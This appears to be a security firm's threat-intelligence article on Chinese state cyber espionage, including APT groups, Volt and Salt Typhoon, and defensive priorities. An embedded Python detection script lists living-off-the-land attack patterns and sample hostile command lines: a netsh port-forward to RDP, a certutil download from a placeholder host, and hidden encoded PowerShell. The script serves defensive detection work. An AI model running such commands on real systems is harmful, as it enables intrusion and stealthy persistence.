# China's Cyber Espionage Program
China operates the largest and most strategically patient state-sponsored cyber espionage program in the world. Where Russia's cyber operations are often destructive and disruptive, China's are characterized by scale, stealth, and long-term strategic alignment with national economic and military objectives. Chinese state actors have stolen intellectual property from virtually every sector of the Western economy, pre-positioned for potential wartime sabotage of critical infrastructure, and maintained persistent access to government and defense networks for years before detection.
The scale is measured in terabytes per operation and trillions of dollars in cumulative economic damage. General Keith Alexander, former NSA Director and founding commander of U.S. Cyber Command, called Chinese cyber espionage "the greatest transfer of wealth in history." The assessment has not changed. The operations have only grown more sophisticated.
CDA's founder has published research on Chinese cyber strategy through the Irregular Warfare Initiative, a joint publication of Princeton University's Empirical Studies of Conflict Project and the Modern War Institute at West Point. That research, "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran," documents the collaborative and increasingly unified nature of adversarial state cyber operations. The analysis below builds on that foundation.
China's cyber apparatus operates through a combination of military units, intelligence agencies, state-affiliated civilian groups, and private companies operating under state direction.
The PLA Strategic Support Force (PLASSF) was established in December 2015 as a dedicated force combining cyber, space, electronic warfare, and psychological operations capabilities under a single command. The PLASSF's Network Systems Department is responsible for cyber operations, consolidating capabilities that were previously distributed across multiple PLA departments.
Prior to the PLASSF's formation, the PLA's cyber operations were conducted by individual unit-level groups, the most famous being Unit 61398 (based in a 12-story building in Shanghai's Pudong district), which was the subject of Mandiant's landmark APT1 report in 2013 and a U.S. DOJ indictment in 2014. The PLASSF centralized and professionalized these operations.
The PLASSF's cyber mission is primarily military: intelligence collection on foreign military capabilities, pre-positioning in adversary critical infrastructure for potential wartime use, and supporting PLA operations in a Taiwan contingency scenario. The military mission is distinct from but complementary to the economic espionage mission conducted primarily by the MSS.
The Ministry of State Security (MSS) is China's primary civilian intelligence agency and the most prolific conductor of cyber espionage against Western commercial, industrial, and government targets. MSS operations are conducted both by MSS officers and by contracted hackers working for MSS regional bureaus (provincial state security departments).
The MSS conducts economic espionage at industrial scale. Targeted sectors include aerospace, semiconductor, pharmaceutical, biotechnology, telecommunications, energy, advanced manufacturing, and any technology sector aligned with China's strategic development priorities (as outlined in the "Made in China 2025" industrial policy, the Five-Year Plans, and the "Thousand Talents" program).
The 2018 DOJ indictment of MSS officers Zhu Hua and Zhang Shilong (associated with APT10/Cloud Hopper) documented a campaign that targeted managed service providers (MSPs) to gain access to the MSPs' clients, affecting companies in aerospace, defense, technology, and other sectors across 12 countries. The operational model (compromise the MSP, pivot to the MSP's clients) predated the Kaseya and SolarWinds supply chain attacks and demonstrated China's early understanding of supply chain attack vectors.
China's cyber ecosystem includes groups that operate at the intersection of state direction and private enterprise. APT41 (also tracked as Double Dragon, Winnti, Barium) is the most documented example: a group that conducts both state-sponsored espionage operations and financially motivated cybercrime, sometimes simultaneously. APT41 has been attributed to operations targeting healthcare, telecommunications, technology, gaming, and government sectors. Its dual mandate (state espionage alongside personal profit) reflects the blurred boundaries in China's cyber ecosystem.
Other groups operate as contractors or affiliates to MSS regional bureaus. The i-Soon leak (February 2024) exposed the operations of a Chinese cybersecurity company that contracted with MSS and PLA to conduct hacking operations against foreign governments, telecommunications companies, and dissidents. The leak revealed contract prices, target lists, and operational tools, providing unprecedented visibility into the commercial contractor model that supports Chinese state-sponsored operations.
China's cyber operations serve four strategic objectives that align directly with the Chinese Communist Party's national priorities:
The primary volume of Chinese cyber operations targets intellectual property: research and development data, trade secrets, manufacturing processes, business strategies, and technology designs. The objective is to accelerate Chinese industrial development by acquiring foreign intellectual property rather than developing it independently.
The FBI has stated that China-related economic espionage investigations constitute a majority of their counterintelligence caseload. The Commission on the Theft of American Intellectual Property estimated the annual cost of Chinese IP theft to the U.S. economy at $225 billion to $600 billion. Targeted sectors align with China's stated development priorities: semiconductor design, aircraft engine technology, pharmaceutical research, AI and quantum computing research, telecommunications infrastructure, and advanced materials.
The discovery of Volt Typhoon in May 2023 revealed a Chinese state-sponsored operation focused not on espionage but on pre-positioning within U.S. critical infrastructure. Volt Typhoon used living-off-the-land techniques (legitimate system tools, no custom malware) to maintain persistent access to infrastructure in telecommunications, energy, water, transportation, and other critical sectors.
The operational purpose was not data theft. It was preparation for potential future sabotage: maintaining the placement and access necessary to disrupt or destroy U.S. critical infrastructure during a future conflict (most likely a Taiwan contingency). CISA, NSA, and FBI issued a joint advisory describing Volt Typhoon's activities as pre-positioning for "disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict."
Salt Typhoon, disclosed in late 2024, targeted U.S. telecommunications providers, gaining access to call metadata, communications content, and lawful intercept systems used by law enforcement. The operation demonstrated both espionage capability (who is communicating with whom) and potential sabotage capability (access to communications infrastructure that could be disrupted during conflict).
The Typhoon operations represent an evolution in Chinese cyber strategy: from economic espionage (steal IP to advance Chinese industry) to strategic pre-positioning (prepare to disrupt adversary infrastructure during wartime). Both objectives are active simultaneously.
Chinese military cyber operations target foreign defense ministries, military contractors, and armed forces to collect intelligence on military capabilities, plans, and technologies. The 2015 OPM breach (attributed to Chinese state actors) compromised the security clearance records of approximately 21.5 million current and former U.S. government employees, providing a comprehensive database for identifying intelligence targets, recruiting assets, and conducting counter-intelligence operations.
Chinese operations against defense contractors have targeted the F-35 Joint Strike Fighter program, naval propulsion systems, missile defense systems, and autonomous vehicle technology. The stolen data has accelerated the development of Chinese military systems that bear striking resemblance to their Western counterparts.
China uses cyber capabilities extensively for domestic surveillance: monitoring the communications of Uyghurs, Tibetans, Hong Kong activists, Falun Gong practitioners, and any individual or group the CCP considers a threat to internal stability. This domestic cyber capability extends internationally: Chinese cyber actors have targeted diaspora communities, foreign journalists covering China, and human rights organizations monitoring Chinese human rights practices.
The domestic surveillance mission represents the Empire side of the Republic/Empire distinction that CDA's geopolitical content observes. Democratic nations build cyber defense to protect citizens. Authoritarian regimes weaponize cyber offense to surveil and repress citizens. China's Great Firewall, its mass surveillance infrastructure, and its targeting of dissidents abroad are the clearest examples of cyber capability used as a tool of domestic control.
Chinese cyber operations share several distinguishing characteristics that differentiate them from Russian, Iranian, and North Korean operations:
Chinese operations are designed for long-term persistence. Where Russian operations often announce themselves through destruction (NotPetya) or disruption (election interference), Chinese operations succeed by remaining undetected for months or years. The SolarWinds operation (conducted by Russia's SVR) was detected after approximately nine months. Chinese operations have been documented with dwell times exceeding two years.
The patience is strategic. China's espionage objectives require sustained access over time: monitoring ongoing R&D programs, tracking evolving business strategies, and continuously collecting intelligence that informs Chinese policy decisions. A single data theft operation produces a snapshot. Persistent access produces a continuous intelligence stream.
Volt Typhoon exemplifies a trend in Chinese operations toward living-off-the-land techniques: using legitimate system tools (PowerShell, WMI, cmd, netsh, certutil) rather than custom malware. Living-off-the-land operations are harder to detect because the tools being used are legitimate tools that every system administrator uses. The difference between an administrator running netsh to configure a network interface and an attacker running netsh to create a port forwarding rule is intent, not technique. Detection requires behavioral analytics that identify anomalous use of legitimate tools, not signature-based detection that matches known malware.
This operational approach directly challenges the traditional SOC model. An organization that relies on malware signatures and IOC matching to detect threats will miss Volt Typhoon-style operations entirely. Detecting Chinese living-off-the-land operations requires the behavioral analytics, threat hunting, and ATT&CK-based detection coverage that CDA's TID operations provide.
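The distinction drawn above between an administrator's netsh and an attacker's netsh comes down, in practice, to command-line arguments and execution context rather than to the binary itself. The following is an added example, not code from the original article or from CDA: a small Python rule set that scores constructed Windows process-creation records for the living-off-the-land patterns named here (netsh portproxy, certutil as a downloader or decoder, encoded PowerShell, WMI remote process creation, ntdsutil) and raises the score when the context is wrong (an unusual parent process, a non-administrative account). The pipe-delimited log format, host names, accounts, parent-process list, weights and threshold are assumptions for illustration; the ATT&CK technique ids are the public MITRE ones.

```python
"""Behavioral triage of living-off-the-land (LOTL) process events.

Added example (not from the original article or from CDA). Scores
Windows process-creation records for misuse of legitimate tools and
for suspicious execution context. The records below are constructed;
the field layout host|user|parent|image|cmdline is an assumed format,
not a specific SIEM or Sysmon schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# (rule name, ATT&CK technique id, command-line pattern, weight)
RULES = [
    ("netsh portproxy rule", "T1090.001",
     re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I), 60),
    ("certutil used to fetch or decode", "T1105/T1140",
     re.compile(r"certutil(\.exe)?\s+.*-(urlcache|decode|encode)\b", re.I), 50),
    ("wmic remote process creation", "T1047",
     re.compile(r"wmic(\.exe)?\s+(/node:\S+\s+)?process\s+call\s+create", re.I), 50),
    ("encoded PowerShell command", "T1059.001",
     re.compile(r"powershell(\.exe)?\s+.*-(e|enc|encodedcommand)\b", re.I), 40),
    ("NTDS extraction via ntdsutil", "T1003.003",
     re.compile(r"ntdsutil(\.exe)?\s+.*\bifm\b", re.I), 70),
]

# Context: the same command is more suspicious from a web server worker or an
# Office process, or from an account that never does administration.
# Both sets are assumed values for the example environment.
SUSPICIOUS_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe", "mshta.exe"}
ADMIN_ACCOUNTS = {"CORP\\svc_netops", "CORP\\itadmin"}


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Benign use of a LOLBin scores 0."""
    score, reasons = 0, []
    for name, technique, pattern, weight in RULES:
        if pattern.search(ev.cmdline):
            score += weight
            reasons.append(f"{name} ({technique})")
    if score == 0:
        return 0, reasons          # no misuse pattern: ordinary admin activity
    if ev.parent.lower() in SUSPICIOUS_PARENTS:
        score += 30
        reasons.append(f"unusual parent {ev.parent}")
    if ev.user not in ADMIN_ACCOUNTS:
        score += 20
        reasons.append(f"non-admin account {ev.user}")
    return score, reasons


def parse_line(line: str) -> ProcessEvent:
    """Parse the assumed 'host|user|parent|image|cmdline' record layout."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return ProcessEvent(host, user, parent, image, cmdline)


def triage(lines, threshold: int = 50):
    """Return [(host, score, reasons)] for records scoring >= threshold."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.host, score, reasons))
    return alerts


# Constructed sample records. Same binaries, different intent and context.
SAMPLE_LOG = [
    # Network admin configuring an interface with netsh: benign.
    "srv01|CORP\\svc_netops|cmd.exe|netsh.exe|netsh interface ip set address \"Ethernet\" dhcp",
    # Port-forwarding rule created from an IIS worker by a non-admin user.
    "srv02|CORP\\jsmith|w3wp.exe|netsh.exe|netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389",
    # certutil used to pull a remote file.
    "ws07|CORP\\mlee|powershell.exe|certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
    # Routine certutil use: listing the local certificate store.
    "ws08|CORP\\itadmin|cmd.exe|certutil.exe|certutil -store my",
    # Hidden, encoded PowerShell spawned by Word.
    "ws09|CORP\\akim|winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgA",
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_LOG):
        print(f"{host}: score={score} " + "; ".join(reasons))
```

Run directly, the two netsh records and the two certutil records score differently although the image is identical in each pair, which is the behavioral rather than signature-based distinction the passage describes. In a real deployment the rule weights and the admin and parent sets would be derived from the environment's own baseline, and the scored events would feed a hunting queue rather than fire as standalone alerts.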
Chinese cyber espionage operations target every sector of the Western economy simultaneously. Unlike Russian operations (which tend to focus on geopolitical targets: government, defense, energy, elections) or North Korean operations (which focus on financial targets), Chinese operations have been attributed in aerospace, automotive, biotechnology, chemical, defense, education, energy, financial services, government, healthcare, IT, legal, manufacturing, media, mining, pharmaceutical, real estate, semiconductor, telecommunications, and transportation.
The breadth means that virtually every organization of any size in any industry is a potential target for Chinese economic espionage. The targeting follows China's published industrial priorities: if a technology appears in Made in China 2025 or the current Five-Year Plan, the corresponding Western industry sector is a target.
The i-Soon leak and other revelations have exposed a commercial contractor model where private Chinese cybersecurity companies compete for government contracts to conduct hacking operations. These contractors provide "hacking as a service" to MSS regional bureaus, bidding on targets, proposing operational approaches, and delivering results for defined fees.
This model provides the Chinese government with scale (many contractors operating simultaneously), deniability (operations are conducted by private companies, not government employees), and cost efficiency (contractors compete on price and capability). It also creates operational security challenges: the i-Soon leak occurred because a contractor's internal data was exposed, revealing client lists, prices, and techniques.
Chinese operations span four primary PDM domains:
DPS: Chinese economic espionage targets data: intellectual property, trade secrets, R&D data, personnel records (OPM breach). DPS controls (data classification, encryption, DLP) protect the data that Chinese actors seek. Customer-managed encryption keys preserve sovereignty against adversaries who may have access to cloud provider infrastructure through legal or extralegal mechanisms.
VSD: Chinese operations exploit supply chain vulnerabilities (APT10/Cloud Hopper MSP compromise), internet-facing services, and living-off-the-land entry vectors. Continuous attack surface management and rapid patching of edge network devices (Volt Typhoon's preferred targets) reduce the entry points.
IAT: Chinese operations involve extensive credential theft and lateral movement through identity infrastructure. The Volt Typhoon advisory specifically identifies credential access and Active Directory reconnaissance as key techniques. Phishing-resistant MFA, PAM, and zero trust architecture limit the effectiveness of stolen credentials.
TID: Chinese living-off-the-land operations are specifically designed to evade signature-based detection. Detecting them requires behavioral analytics, ATT&CK-based detection engineering, and proactive threat hunting targeted to Chinese TTPs. CDA's PDI methodology applies directly: threat intelligence about current Chinese targeting (from CISA advisories, threat intel feeds, and CDA's own analysis) informs the detection rules and hunting hypotheses that find Chinese operations in client environments.
Chinese cyber threats affect every organization in every sector. The targeting is not limited to government and defense. Any organization that produces, develops, or holds intellectual property aligned with China's industrial priorities is a target. Any organization that operates or supports critical infrastructure is a potential pre-positioning target.
Defense against Chinese threat actors requires three priorities that CDA's PDM addresses:
Detect the undetectable. Chinese living-off-the-land operations cannot be detected through signatures and IOC matching. Organizations must invest in behavioral analytics (TID-H01: Detection Engineering Program), threat hunting (TID-H03: Threat Hunting Program), and detection coverage mapped against ATT&CK techniques (TID-R02: Detection Coverage Assessment). The detection program must be tuned to the techniques that Chinese actors specifically use.
Protect the crown jewels. Chinese operations target specific data. Data classification (DPS-R02, DPS-B01) identifies the most valuable data. Encryption with customer-managed keys (DPS-B02) protects it even if the attacker achieves access. DLP (DPS-B03) detects and blocks exfiltration. The DPS controls determine whether a Chinese intrusion results in intelligence collection or a contained access event with no data loss.
Harden the edge. Volt Typhoon targets edge network devices (routers, VPN appliances, firewalls) with outdated firmware. Patching edge devices within 48 hours of critical vulnerability disclosure (VSD-B02), monitoring the external attack surface continuously (VSD-C01), and hardening cloud configurations (VSD-H02) reduce the entry points that Chinese pre-positioning operations exploit.
Written by Evan Morgan